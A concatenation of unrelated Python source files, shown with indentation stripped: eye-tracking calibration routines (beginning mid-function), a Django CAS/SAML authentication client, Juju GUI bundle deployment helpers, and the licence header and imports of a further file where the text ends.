central_fix = 0.0, 0.0
return C, central_fix
def FindFixations(x, y, plims=(5,95), sigma=2.0):
'''
Find fixations by blob location in pupil center heat map
Fixations returned are not time ordered
'''
# Find robust ranges
xmin, xmax = np.percentile(x, plims)
ymin, ymax = np.percentile(y, plims)
# Expand bounding box by 30%
sf = 1.30
hx, hy = (xmax - xmin) * sf * 0.5, (ymax - ymin) * sf * 0.5
cx, cy = (xmin + xmax) * 0.5, (ymin + ymax) * 0.5
xmin, xmax = cx - hx, cx + hx
ymin, ymax = cy - hy, cy + hy
# Compute calibration video heatmap
hmap, xedges, yedges = HeatMap(x, y, (xmin, xmax), (ymin, ymax), sigma)
# Heatmap dimensions
# *** Note y/row, x/col ordering
ny, nx = hmap.shape
# Determine blob threshold for heatmap
# Need to accommodate hotspots from longer fixations
# particularly at center.
# A single fixation blob shouldn't exceed 1% of total frame
# area so clamp heatmap to 99th percentile
pA, pB = np.percentile(hmap, (0, 99))
hmap = exposure.rescale_intensity(hmap, in_range = (pA, pB))
# Otsu threshold clamped heatmap
th = filters.threshold_otsu(hmap)
blobs = np.array(hmap > th, np.uint8)
# Morphological opening (circle 2 pixels diameter)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3,3))
# blobs = cv2.morphologyEx(blobs, cv2.MORPH_OPEN, kernel)
# Label connected components
labels, n_labels = ndimage.label(blobs)
# Find blob centroids
# Transpose before assigning to x and y arrays
pnts = np.array(ndimage.measurements.center_of_mass(hmap, labels, range(1, n_labels+1)))
# Parse x and y coordinates
# *** Note y/row, x/col ordering
fix_x, fix_y = pnts[:,1], pnts[:,0]
# Map blob centroids to video pixel space using xedges and yedges
# of histogram2d bins (heatmap pixels). Note that pixels are centered
# on their coordinates when rendered by imshow. So a pixel at (1,2) is
# rendered as a rectangle with corners at (0.5,1.5) and (1.5, 2.5)
fix_xi = np.interp(fix_x, np.linspace(-0.5, nx-0.5, nx+1), xedges)
fix_yi = np.interp(fix_y, np.linspace(-0.5, ny-0.5, ny+1), yedges)
# Fixation centroids (n x 2)
fixations = np.array((fix_xi, fix_yi)).T
return fixations, hmap, xedges, yedges
def SortFixations(t, x, y, fixations):
'''
Temporally sort detected spatial fixations
Arguments
----
t : float vector
Sample time points in seconds
x : float vector
Pupil center x coordinate timeseries
y : float vector
Pupil center y coordinate timeseries
fixations : n x 2 float array
Detected spatial fixation coordinates
Returns
----
fixations_sorted : n x 2 float array
Spatial fixations sorted temporally
'''
# Count number of fixations and timepoints
nt = x.shape[0]
nf = fixations.shape[0]
# Put coordinate timeseries in columns
X = np.zeros([nt,2])
X[:,0] = x
X[:,1] = y
# Map each pupil center to nearest fixation
idx = NearestFixation(X, fixations)
# Median time of each fixation
t_fix = np.zeros(nf)
for fc in np.arange(0,nf):
t_fix[fc] = np.median(t[idx==fc])
# Temporally sort fixations
fix_order = np.argsort(t_fix)
fixations_sorted = fixations[fix_order,:]
return fixations_sorted
def NearestFixation(X, fixations):
'''
Map pupil centers to index of nearest fixation
'''
# Number of time points and fixations
nt = X.shape[0]
nf = fixations.shape[0]
# Distance array
dist2fix = np.zeros((nt, nf))
# Fill distance array (nt x nfix)
for (fix_i, fix) in enumerate(fixations):
dx, dy = X[:,0] - fix[0], X[:,1] - fix[1]
dist2fix[:, fix_i] = np.sqrt(dx**2 + dy**2)
# Find index of minimum distance fixation for each timepoint
return np.argmin(dist2fix, axis=1)
def CalibrationModel(fixations, targets):
'''
Construct biquadratic transform from video space to gaze space
BIQUADRATIC CALIBRATION MODEL
----
We need to solve the matrix equation C * R = R0 where
C = biquadratic transform matrix (2 x 6) (rank 2, full row rank)
R = fixation matrix (6 x n) in video space (rank 6)
R0 = fixation targets (2 x n) in gaze space (rank 2)
R has rows xx, xy, yy, x, y, 1
Arguments
----
fixations : n x 2 float array
Fixation coordinates in video space. n >= 6
targets : n x 2 float array
Fixation targets in normalized gaze space
Returns
----
C : 2 x 6 float array
Biquadratic video-gaze post-multiply transform matrix
'''
# Init biquadratic coefficient array
C = np.zeros((2,6))
# Need at least 6 points for biquadratic mapping
if fixations.shape[0] < 6:
print('Too few fixations for biquadratic video to gaze mapping')
return C
# Create fixation biquadratic matrix, R
R = MakeR(fixations)
# R0 is the transposed target coordinate array (2 x n)
R0 = targets.transpose()
# Compute C by pseudoinverse of R (R+)
# C.R = R0
# C.R.R+ = R0.R+ = C
Rplus = np.linalg.pinv(R)
C = R0.dot(Rplus)
# Check that C maps correctly
# print(C.dot(R).transpose())
# print(R0.transpose())
return C
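# Illustrative sketch (values assumed, not taken from a real calibration run):
# with nine detected fixations and the nine targets of a 3 x 3 calibration grid,
# the solve above reduces to
#
#   R = MakeR(fixations)                    # 6 x 9 biquadratic design matrix
#   C = targets.T.dot(np.linalg.pinv(R))    # 2 x 6 video-to-gaze transform
#
# after which C.dot(MakeR(new_points)) maps new pupil centers into gaze space.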
def MakeR(points):
# Extract coordinates from n x 2 points matrix
x, y = points[:,0], points[:,1]
# Additional binomial coordinates
xx = x * x
yy = y * y
xy = x * y
# Construct R (n x 6)
R = np.array((xx, xy, yy, x, y, np.ones_like(x)))
return R
def HeatMap(x, y, xlims, ylims, sigma=1.0):
'''
Convert pupil center timeseries to 2D heatmap
'''
# Eliminate NaNs in x, y (from blinks)
x = x[np.isfinite(x)]
y = y[np.isfinite(y)]
# Parse out limits
xmin, xmax = xlims
ymin, ymax = ylims
#---
# NOTE: heatmap dimensions are y (1st) then x (2nd)
# corresponding to rows then columns.
# All coordinate orderings are adjusted accordingly
#---
# Composite histogram axis ranges
# Make bin count different for x and y for debugging
# *** Note y/row, x/col ordering
hbins = [np.linspace(ymin, ymax, 64), np.linspace(xmin, xmax, 65)]
# Construct histogram
# *** Note y/row, x/col ordering
hmap, yedges, xedges = np.histogram2d(y, x, bins=hbins)
# Gaussian blur
if sigma > 0:
hmap = cv2.GaussianBlur(hmap, (0,0), sigma, sigma)
return hmap, xedges, yedges
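# Ordering note (an illustration of the y/row, x/col convention used above):
# np.histogram2d(y, x, bins=hbins) bins its first argument along rows, so with
# 64 y-edges and 65 x-edges the returned hmap has shape (63, 64). Callers
# therefore unpack hmap.shape as (ny, nx), and the edges come back as
# (yedges, xedges) before being reordered to (hmap, xedges, yedges) here.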
def ApplyCalibration(ss_dir, C, central_fix, cfg):
'''
Apply calibration transform to gaze pupil center timeseries
- apply motion correction if requested (highpass or known fixations)
- Save calibrated gaze to text file in results directory
Arguments
----
Returns
----
'''
print(' Calibrating pupilometry timeseries')
# Uncalibrated gaze pupilometry file
gaze_uncal_csv = os.path.join(ss_dir,'results','gaze_pupils.csv')
# Known central fixations file
fixations_txt = os.path.join(ss_dir,'videos','fixations.txt')
if not os.path.isfile(gaze_uncal_csv):
print('* Uncalibrated gaze pupilometry not found - returning')
return False
# Read raw pupilometry data
p = engine.ReadPupilometry(gaze_uncal_csv)
# Extract useful timeseries
t = p[:,0] # Video soft timestamp
x = p[:,2] # Pupil x
y = p[:,3] # Pupil y
# Retrospective motion correction - only use when consistent glint is unavailable
motioncorr = cfg.get('ARTIFACTS','motioncorr')
mocokernel = cfg.getint('ARTIFACTS','mocokernel')
if motioncorr == 'knownfixations':
print(' Motion correction using known fixations')
print(' Central fixation at (%0.3f, %0.3f)' % (central_fix[0], central_fix[1]))
x, y, bx, by = moco.KnownFixations(t, x, y, fixations_txt, central_fix)
elif motioncorr == 'highpass':
print(' Motion correction by high pass filtering (%d sample kernel)' % mocokernel)
print(' Central fixation at (%0.3f, %0.3f)' % (central_fix[0], central_fix[1]))
x, y, bx, by = moco.HighPassFilter(t, x, y, mocokernel, central_fix)
elif motioncorr == 'glint':
print(' Using glint for motion correction. Skipping here, in calibrate.py (for now)')
# Return dummy x and y baseline estimates
bx, by = np.zeros_like(x), np.zeros_like(y)
else:
print('* Unknown motion correction requested (%s) - skipping' % (motioncorr))
# Return dummy x and y baseline estimates
bx, by = np.zeros_like(x), np.zeros_like(y)
# Additional binomial coordinates
xx = x * x
yy = y * y
xy = x * y
# Construct R
R = np.array((xx, xy, yy, x, y, np.ones_like(x)))
# Apply calibration transform to pupil-glint vector timeseries
# (2 x n) = (2 x 6) x (6 x n)
gaze = C.dot(R)
# Write calibrated gaze to CSV file in results directory
gaze_csv = os.path.join(ss_dir,'results','gaze_calibrated.csv')
WriteGaze(gaze_csv, t, gaze[0,:], gaze[1,:], bx, by)
return True
def CentralFixation(fixations, targets):
'''
Find video coordinate corresponding to gaze fixation at (0.5, 0.5)
'''
idx = -1
central_fix = np.array([np.NaN, np.NaN])
for ii in range(targets.shape[0]):
if targets[ii,0] == 0.5 and targets[ii,1] == 0.5:
idx = ii
central_fix = fixations[idx,:]
if idx < 0:
print('* Central fixation target not found')
central_fix = np.array([np.NaN, np.NaN])
return central_fix
def WriteGaze(gaze_csv, t, gaze_x, gaze_y, bline_x, bline_y):
'''
Write calibrated gaze to CSV file
'''
# Open calibrated gaze CSV file to write
try:
gaze_stream = open(gaze_csv, 'w')
except:
print('* Problem opening gaze CSV file to write - skipping')
return False
'''
Write gaze lines to file
Timeseries in columns. Column order is:
0 : Time (s)
1 : Calibrated gaze x
2 : Calibrated gaze y
3 : Baseline x
4 : Baseline y
'''
for (tc,tt) in enumerate(t):
gaze_stream.write('%0.3f,%0.3f,%0.3f,%0.3f,%0.3f\n' %
(tt, gaze_x[tc], gaze_y[tc], bline_x[tc], bline_y[tc]))
# Close gaze CSV file
gaze_stream.close()
return True
def ReadGaze(gaze_csv):
'''
Read calibrated gaze timeseries from CSV file
'''
# Read time series in rows
gt = np.genfromtxt(gaze_csv, delimiter=',')
# Parse out array
t, gaze_x, gaze_y = gt[:,0], gt[:,1], gt[:,2]
return t, gaze_x, gaze_y
def PlotCalibration(res_dir, hmap, xedges, yedges, fixations):
'''
Plot the calibration heatmap and temporally sorted fixation labels
'''
# Create a new figure
fig = plt.figure(figsize = (6,6))
# Plot spatial heatmap with fixation centroids
plt.imshow(hmap, interpolation='nearest', aspect='equal',
extent=[xedges[0], xedges[-1], yedges[-1], yedges[0]])
# Fixation coordinate vectors
fx, fy = fixations[:,0], fixations[:,1]
# Overlay fixation centroids with temporal order labels
plt.scatter(fx, fy, c='w', s=40)
alignment = {'horizontalalignment':'center', 'verticalalignment':'center'}
for fc in np.arange(0,fx.shape[0]):
plt.text(fx[fc], fy[fc], '%d' % fc, backgroundcolor='w', color='k', **alignment)
# Save figure without displaying
plt.savefig(os.path.join(res_dir, 'cal_fix_space.png'), dpi=150, bbox_inches='tight')
# Close figure without showing it
plt.close(fig)
def WriteCalibration(ss_res_dir, fixations, C, central_fix):
'''
Write calibration matrix and fixations to CSV files in results subdirectory
'''
# Write calibration matrix to text file in results subdir
calmat_csv = os.path.join(ss_res_dir, 'calibration_matrix.csv')
# Write calibration matrix to CSV file
try:
np.savetxt(calmat_csv, C, delimiter=",")
except:
print('* Problem saving calibration matrix to CSV file - skipping')
return False
# Write calibration fixations in video space to results subdir
calfix_csv = os.path.join(ss_res_dir, 'calibration_fixations.csv')
# Write calibration fixations to CSV file
try:
np.savetxt(calfix_csv, fixations, delimiter=",")
except:
print('* Problem saving calibration fixations to CSV file - skipping')
return False
# Write central fixation in video space to results subdir
ctrfix_csv = os.path.join(ss_res_dir, 'central_fixation.csv')
# Write calibration fixations to CSV file
try:
np.savetxt(ctrfix_csv, central_fix, delimiter=",")
except:
print('* Problem saving central fixation to CSV file - skipping')
return False
return True
|
|
from django.conf import settings
from django.utils import six
from django.contrib.auth import get_user_model
from django.utils.six.moves import urllib_parse
from django.utils.six.moves.urllib_request import urlopen, Request
from uuid import uuid4
import datetime
import inspect
import importlib
"""
if settings.CAS_VERSION not in _PROTOCOLS:
raise ValueError('Unsupported CAS_VERSION %r' % settings.CAS_VERSION)
if settings.CAS_PROXY_CALLBACK and settings.CAS_VERSION not in ['2', '3']:
raise ValueError('proxy callback only supported by CAS_VERSION 2 and 3')
"""
class CASError(ValueError):
pass
class CASClient(object):
def __new__(self, *args, **kwargs):
version = kwargs.pop('version')
if version in (1, '1'):
return CASClientV1(*args, **kwargs)
elif version in (2, '2'):
return CASClientV2(*args, **kwargs)
elif version in (3, '3'):
return CASClientV3(*args, **kwargs)
elif version == 'CAS_2_SAML_1_0':
return CASClientWithSAMLV1(*args, **kwargs)
else:
cas_client_impl = version
try:
if isinstance(version, six.string_types):
module_name, class_name = cas_client_impl.rsplit(".", 1)
cas_client_impl = getattr(importlib.import_module(module_name), class_name)
if inspect.isclass(cas_client_impl):
return cas_client_impl(*args, **kwargs)
except:
# do nothing
pass
raise ValueError('Unsupported CAS_VERSION %r' % version)
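# Illustrative usage sketch (URLs below are placeholders, not a real deployment):
#
#   client = CASClient(version=3,
#                      service_url='https://app.example.com/accounts/login/',
#                      server_url='https://cas.example.com/cas/')
#
# returns a CASClientV3 instance, while passing a dotted path such as
# 'myproject.cas.CustomCASClient' as version imports and instantiates that class.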
class CASClientBase(object):
def __init__(self, service_url=None, server_url=None,
extra_login_params=None, renew=False,
username_attribute=None, proxy_callback=None):
if proxy_callback:
raise ValueError('Proxy callback not supported by this CASClient')
self.service_url = service_url
self.server_url = server_url
self.extra_login_params = extra_login_params or {}
self.renew = renew
self.username_attribute = username_attribute
def verify_ticket(self, ticket):
"""Verify the given ticket.
Return (username, attributes, pgtiou) on success, or (None, None, None)
on failure.
"""
raise NotImplementedError()
def get_or_create_user(self, username, attributes):
"""get or create a user
Return (created, user).
The returned user can be `None`.
"""
if not username:
return False, None
User = get_user_model()
try:
user = User.objects.get(**{User.USERNAME_FIELD: username})
created = False
except User.DoesNotExist:
# check if we want to create new users, if we don't fail auth
create = getattr(settings, 'CAS_CREATE_USER', True)
if not create:
return False, None
# user will have an "unusable" password
user = User.objects.create_user(username, '')
user.save()
created = True
return created, user
def get_login_url(self):
"""Generates CAS login URL"""
params = {'service': self.service_url}
if self.renew:
params.update({'renew': 'true'})
params.update(self.extra_login_params)
url = urllib_parse.urljoin(self.server_url, 'login')
query = urllib_parse.urlencode(params)
return url + '?' + query
def _get_logout_redirect_parameter_name(self):
"""Return the parameter name to be used for passing the redirect_url
to the CAS logout page."""
# This parameter was named 'url' in CAS 2.0, but was renamed to
# service in later CAS versions.
return 'service'
def get_logout_url(self, redirect_url=None):
"""Generates CAS logout URL"""
url = urllib_parse.urljoin(self.server_url, 'logout')
if redirect_url:
param_name = self._get_logout_redirect_parameter_name()
url += '?' + urllib_parse.urlencode({param_name: redirect_url})
return url
def get_proxy_url(self, pgt):
"""Returns proxy url, given the proxy granting ticket"""
params = urllib_parse.urlencode({'pgt': pgt, 'targetService': self.service_url})
return "%s/proxy?%s" % (self.server_url, params)
def get_proxy_ticket(self, pgt):
"""Returns proxy ticket given the proxy granting ticket"""
response = urlopen(self.get_proxy_url(pgt))
if response.code == 200:
from lxml import etree
root = etree.fromstring(response.read())
tickets = root.xpath(
"//cas:proxyTicket",
namespaces={"cas": "http://www.yale.edu/tp/cas"}
)
if len(tickets) == 1:
return tickets[0].text
errors = root.xpath(
"//cas:authenticationFailure",
namespaces={"cas": "http://www.yale.edu/tp/cas"}
)
if len(errors) == 1:
raise CASError(errors[0].attrib['code'], errors[0].text)
raise CASError("Bad http code %s" % response.code)
class CASClientV1(CASClientBase):
"""CAS Client Version 1"""
def verify_ticket(self, ticket):
"""Verifies CAS 1.0 authentication ticket."""
params = [('ticket', ticket), ('service', self.service_url)]
url = (urllib_parse.urljoin(self.server_url, 'validate') + '?' +
urllib_parse.urlencode(params))
page = urlopen(url)
try:
verified = page.readline().strip()
if verified == b'yes':
return page.readline().strip(), None, None
else:
return None, None, None
finally:
page.close()
def _get_logout_redirect_parameter_name(self):
return 'url'
class CASClientV2(CASClientBase):
"""CAS Client Version 2"""
def __init__(self, proxy_callback=None, *args, **kwargs):
"""proxy_callback is for V2 and V3 so V3 is subclass of V2"""
self.proxy_callback = proxy_callback
super(CASClientV2, self).__init__(*args, **kwargs)
def verify_ticket(self, ticket):
"""Verifies CAS 2.0+ XML-based authentication ticket."""
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
user = None
pgtiou = None
params = [('ticket', ticket), ('service', self.service_url)]
if self.proxy_callback:
params.append(('pgtUrl', self.proxy_callback))
url = (urllib_parse.urljoin(self.server_url, 'serviceValidate') + '?' +
urllib_parse.urlencode(params))
page = urlopen(url)
try:
response = page.read()
tree = ElementTree.fromstring(response)
if tree[0].tag.endswith('authenticationSuccess'):
for element in tree[0]:
if element.tag.endswith('user'):
user = element.text
elif element.tag.endswith('proxyGrantingTicket'):
pgtiou = element.text
return user, None, pgtiou
else:
return None, None, None
finally:
page.close()
def _get_logout_redirect_parameter_name(self):
return 'url'
class CASClientV3(CASClientV2):
"""CAS Client Version 3"""
def verify_ticket(self, ticket):
"""Verifies CAS 3.0+ XML-based authentication ticket and returns extended attributes."""
response = self.get_verification_response(ticket)
return self.verify_response(response)
def get_verification_response(self, ticket):
params = [('ticket', ticket), ('service', self.service_url)]
if self.proxy_callback:
params.append(('pgtUrl', self.proxy_callback))
base_url = urllib_parse.urljoin(self.server_url, 'proxyValidate')
url = base_url + '?' + urllib_parse.urlencode(params)
page = urlopen(url)
return page.read()
@classmethod
def verify_response(cls, response):
user = None
attributes = {}
pgtiou = None
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
tree = ElementTree.fromstring(response)
if tree[0].tag.endswith('authenticationSuccess'):
for element in tree[0]:
if element.tag.endswith('user'):
user = element.text
elif element.tag.endswith('proxyGrantingTicket'):
pgtiou = element.text
elif element.tag.endswith('attributes'):
for attribute in element:
tag = attribute.tag.split("}").pop()
if tag in attributes:
if isinstance(attributes[tag], list):
attributes[tag].append(attribute.text)
else:
attributes[tag] = [attributes[tag]]
attributes[tag].append(attribute.text)
else:
attributes[tag] = attribute.text
return user, attributes, pgtiou
def _get_logout_redirect_parameter_name(self):
return 'service'
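# Illustrative example (a hand-written response, not taken from a CAS server):
# given a CAS 3.0 success document such as
#
#   <cas:serviceResponse xmlns:cas="http://www.yale.edu/tp/cas">
#     <cas:authenticationSuccess>
#       <cas:user>jdoe</cas:user>
#       <cas:attributes><cas:email>jdoe@example.com</cas:email></cas:attributes>
#     </cas:authenticationSuccess>
#   </cas:serviceResponse>
#
# CASClientV3.verify_response(response) would return
# ('jdoe', {'email': 'jdoe@example.com'}, None).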
SAML_1_0_NS = 'urn:oasis:names:tc:SAML:1.0:'
SAML_1_0_PROTOCOL_NS = '{' + SAML_1_0_NS + 'protocol' + '}'
SAML_1_0_ASSERTION_NS = '{' + SAML_1_0_NS + 'assertion' + '}'
SAML_ASSERTION_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<samlp:Request xmlns:samlp="urn:oasis:names:tc:SAML:1.0:protocol"
MajorVersion="1"
MinorVersion="1"
RequestID="{request_id}"
IssueInstant="{timestamp}">
<samlp:AssertionArtifact>{ticket}</samlp:AssertionArtifact></samlp:Request>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
class CASClientWithSAMLV1(CASClientBase):
"""CASClient 3.0+ with SAML"""
def verify_ticket(self, ticket):
"""Verifies CAS 3.0+ XML-based authentication ticket and returns extended attributes.
@date: 2011-11-30
@author: Carlos Gonzalez Vila <carlewis@gmail.com>
"""
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
page = self.fetch_saml_validation(ticket)
try:
user = None
attributes = {}
response = page.read()
tree = ElementTree.fromstring(response)
# Find the authentication status
success = tree.find('.//' + SAML_1_0_PROTOCOL_NS + 'StatusCode')
if success is not None and success.attrib['Value'].endswith(':Success'):
# User is validated
attrs = tree.findall('.//' + SAML_1_0_ASSERTION_NS + 'Attribute')
for at in attrs:
if self.username_attribute in list(at.attrib.values()):
user = at.find(SAML_1_0_ASSERTION_NS + 'AttributeValue').text
attributes['uid'] = user
values = at.findall(SAML_1_0_ASSERTION_NS + 'AttributeValue')
if len(values) > 1:
values_array = []
for v in values:
values_array.append(v.text)
attributes[at.attrib['AttributeName']] = values_array
else:
attributes[at.attrib['AttributeName']] = values[0].text
return user, attributes, None
finally:
page.close()
def fetch_saml_validation(self, ticket):
# We do the SAML validation
headers = {
'soapaction': 'http://www.oasis-open.org/committees/security',
'cache-control': 'no-cache',
'pragma': 'no-cache',
'accept': 'text/xml',
'connection': 'keep-alive',
'content-type': 'text/xml; charset=utf-8',
}
params = [('TARGET', self.service_url)]
saml_validate_url = urllib_parse.urljoin(
self.server_url, 'samlValidate',
)
request = Request(
saml_validate_url + '?' + urllib_parse.urlencode(params),
self.get_saml_assertion(ticket),
headers,
)
page = urlopen(request)
return page
@classmethod
def get_saml_assertion(cls, ticket):
"""
http://www.jasig.org/cas/protocol#samlvalidate-cas-3.0
SAML request values:
RequestID [REQUIRED]:
unique identifier for the request
IssueInstant [REQUIRED]:
timestamp of the request
samlp:AssertionArtifact [REQUIRED]:
the valid CAS Service Ticket obtained as a response parameter at login.
"""
# RequestID [REQUIRED] - unique identifier for the request
request_id = uuid4()
# e.g. 2014-06-02T09:21:03.071189
timestamp = datetime.datetime.now().isoformat()
return SAML_ASSERTION_TEMPLATE.format(
request_id=request_id,
timestamp=timestamp,
ticket=ticket,
).encode('utf8')
@classmethod
def get_saml_slos(cls, logout_request):
"""returns saml logout ticket info"""
from lxml import etree
try:
root = etree.fromstring(logout_request)
return root.xpath(
"//samlp:SessionIndex",
namespaces={'samlp': "urn:oasis:names:tc:SAML:2.0:protocol"})
except etree.XMLSyntaxError:
pass
def _get_logout_redirect_parameter_name(self):
return 'service'
|
|
# This file is part of the Juju GUI, which lets users view and manage Juju
# environments within a graphical interface (https://launchpad.net/juju-gui).
# Copyright (C) 2013 Canonical Ltd.
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License version 3, as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranties of MERCHANTABILITY,
# SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Bundle deployment utility functions and objects."""
import collections
from functools import wraps
import itertools
import logging
import time
import urllib
from tornado import (
gen,
escape,
)
from tornado.httpclient import AsyncHTTPClient
from guiserver.watchers import AsyncWatcher
from jujuclient import EnvError
# Change statuses.
SCHEDULED = 'scheduled'
STARTED = 'started'
CANCELLED = 'cancelled'
COMPLETED = 'completed'
# Define a sequence of allowed constraints to be used in the process of
# preparing the bundle object. See the _prepare_constraints function below.
ALLOWED_CONSTRAINTS = ('arch', 'cpu-cores', 'cpu-power', 'mem')
def create_change(deployment_id, status, queue=None, error=None):
"""Return a dict representing a deployment change.
The resulting dict contains at least the following fields:
- DeploymentId: the deployment identifier;
- Status: the deployment's current status;
- Time: the time in seconds since the epoch as an int.
These optional fields can also be present:
- Queue: the deployment position in the queue at the time of this change;
- Error: a message describing an error occurred during the deployment.
"""
result = {
'DeploymentId': deployment_id,
'Status': status,
'Time': int(time.time()),
}
if queue is not None:
result['Queue'] = queue
if error is not None:
result['Error'] = error
return result
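# Illustrative example (identifier and timestamp are made up): a change announcing
# that deployment 42 reached the front of the queue looks like
#   {'DeploymentId': 42, 'Status': 'started', 'Time': 1384000000, 'Queue': 0}
# while a failed completion carries an 'Error' message instead of 'Queue'.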
def message_from_error(exception):
"""Return a (possibly) human readable message from the given exception.
Also log the error message to the log file.
"""
logging.error('error deploying the bundle')
logging.error('error type: {}'.format(type(exception)))
if isinstance(exception, EnvError):
message = exception.message.strip()
else:
message = str(exception).strip()
if message:
logging.error('error message: {}'.format(message))
else:
logging.error('empty error message')
message = 'no further details can be provided'
return message
class Observer(object):
"""Handle multiple deployment watchers."""
def __init__(self):
# Map deployment identifiers to watchers.
self.deployments = {}
# Map watcher identifiers to deployment identifiers.
self.watchers = {}
# This counter is used to generate deployment identifiers.
self._deployment_counter = itertools.count()
# This counter is used to generate watcher identifiers.
self._watcher_counter = itertools.count()
def add_deployment(self):
"""Start observing a deployment.
Generate a deployment id and add it to self.deployments.
Return the generated deployment id.
"""
deployment_id = self._deployment_counter.next()
self.deployments[deployment_id] = AsyncWatcher()
logging.info('deployment {} scheduled'.format(deployment_id))
return deployment_id
def add_watcher(self, deployment_id):
"""Return a new watcher id for the given deployment id.
Also add the generated watcher id to self.watchers.
"""
watcher_id = self._watcher_counter.next()
self.watchers[watcher_id] = deployment_id
logging.debug('deployment {} observed by watcher {}'.format(
deployment_id, watcher_id))
return watcher_id
def notify_position(self, deployment_id, position):
"""Add a change to the deployment watcher notifying a new position.
If the position in the queue is 0, it means the deployment is started
or about to start. Therefore set its status to STARTED.
"""
watcher = self.deployments[deployment_id]
status = SCHEDULED if position else STARTED
change = create_change(deployment_id, status, queue=position)
watcher.put(change)
logging.debug('deployment {} now in position {}'.format(
deployment_id, position))
def notify_cancelled(self, deployment_id):
"""Add a change to the deployment watcher notifying it is cancelled."""
watcher = self.deployments[deployment_id]
change = create_change(deployment_id, CANCELLED)
watcher.close(change)
logging.info('deployment {} cancelled'.format(deployment_id))
def notify_completed(self, deployment_id, error=None):
"""Add a change to the deployment watcher notifying it is completed."""
watcher = self.deployments[deployment_id]
change = create_change(deployment_id, COMPLETED, error=error)
watcher.close(change)
logging.info('deployment {} completed'.format(deployment_id))
def _prepare_constraints(constraints):
"""Validate and prepare the given service constraints.
If constraints are passed as a string, convert them to be a dict.
Return the validated constraints dict.
Raise a ValueError if unsupported constraints are present.
"""
if not isinstance(constraints, collections.Mapping):
try:
constraints = dict(i.split('=') for i in constraints.split(','))
except ValueError:
# A ValueError is raised if constraints are invalid, e.g. "cpu=,".
raise ValueError('invalid constraints: {}'.format(constraints))
unsupported = set(constraints).difference(ALLOWED_CONSTRAINTS)
if unsupported:
msg = 'unsupported constraints: {}'.format(
', '.join(sorted(unsupported)))
raise ValueError(msg)
return constraints
def prepare_bundle(bundle):
"""Validate and prepare the bundle.
In particular, convert the service constraints, if they are present and if
they are represented as a string, to a dict, as expected by the deployer.
Modify in place the given YAML decoded bundle dictionary.
Return None if everything is ok.
Raise a ValueError if:
- the bundle is not well structured;
- the bundle does not include services;
- the bundle includes unsupported constraints.
"""
# XXX frankban 2013-11-07: is the GUI Server in charge of validating the
# bundles? For now, the weak checks below should be enough.
if not isinstance(bundle, collections.Mapping):
raise ValueError('the bundle data is not well formed')
services = bundle.get('services')
if not isinstance(services, collections.Mapping):
raise ValueError('the bundle does not contain any services')
# Handle services' constraints.
for service_data in services.values():
if 'constraints' in service_data:
constraints = service_data['constraints']
if not constraints:
# If constraints is an empty string, just delete the key.
del service_data['constraints']
else:
# Otherwise sanitize the value.
service_data['constraints'] = _prepare_constraints(constraints)
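# Illustrative sketch (service name and values are assumptions): given a decoded
# bundle such as
#   {'services': {'wordpress': {'constraints': 'cpu-cores=4,mem=2048'}}}
# prepare_bundle() rewrites the constraints in place to
#   {'services': {'wordpress': {'constraints': {'cpu-cores': '4', 'mem': '2048'}}}}
# whereas a key outside ALLOWED_CONSTRAINTS (e.g. 'tags=foo') makes
# _prepare_constraints raise ValueError.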
def require_authenticated_user(view):
"""Require the user to be authenticated when executing the decorated view.
This function can be used to decorate bundle views. Each view receives
a request and a deployer, and the user instance is stored in request.user.
If the user is not authenticated an error response is raised when calling
the view. Otherwise, the view is executed normally.
"""
@wraps(view)
def decorated(request, deployer):
if not request.user.is_authenticated:
raise response(error='unauthorized access: no user logged in')
return view(request, deployer)
return decorated
def response(info=None, error=None):
"""Create a response containing the given (optional) info and error values.
This function is intended to be used by bundles views.
Return a gen.Return instance, so that the result of this method can easily
be raised from coroutines.
"""
if info is None:
info = {}
data = {'Response': info}
if error is not None:
logging.error('deployer: {}'.format(escape.utf8(error)))
data['Error'] = error
return gen.Return(data)
@gen.coroutine
def increment_deployment_counter(bundle_id, charmworld_url):
"""Increment the deployment count in Charmworld.
If the call to Charmworld fails we log the error but don't report it.
This counter is a 'best effort' attempt but it will not impede our
deployment of the bundle.
Arguments are:
- bundle_id: the ID for the bundle in Charmworld.
- charmworld_url: the URL for charmworld, including the protocol.
If None, do nothing.
Returns True if the counter is successfully incremented else False.
"""
if charmworld_url is None:
raise gen.Return(False)
if not all((isinstance(bundle_id, basestring),
isinstance(charmworld_url, basestring))):
raise gen.Return(False)
path = 'metric/deployments/increment'
url = u'{}api/3/bundle/{}/{}'.format(
charmworld_url,
urllib.quote(bundle_id), path)
logging.info('Incrementing bundle deployment count using\n{}.'.format(
url.encode('utf-8')))
client = AsyncHTTPClient()
# We use a GET instead of a POST since there is no request body.
try:
resp = yield client.fetch(url, callback=None)
except Exception as exc:
logging.error('Attempt to increment deployment counter failed.')
logging.error('URL: {}'.format(url))
logging.exception(exc)
raise gen.Return(False)
success = bool(resp.code == 200)
raise gen.Return(success)
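# Illustrative sketch (host and bundle id are assumptions): with
# charmworld_url='https://manage.jujucharms.com/' and bundle_id='wiki-simple/4/wiki',
# the fetch above targets
#   https://manage.jujucharms.com/api/3/bundle/wiki-simple/4/wiki/metric/deployments/increment
# and any failure or non-200 response simply resolves the coroutine to False.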
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import datetime
import hashlib
import io
import json
import os
import requests
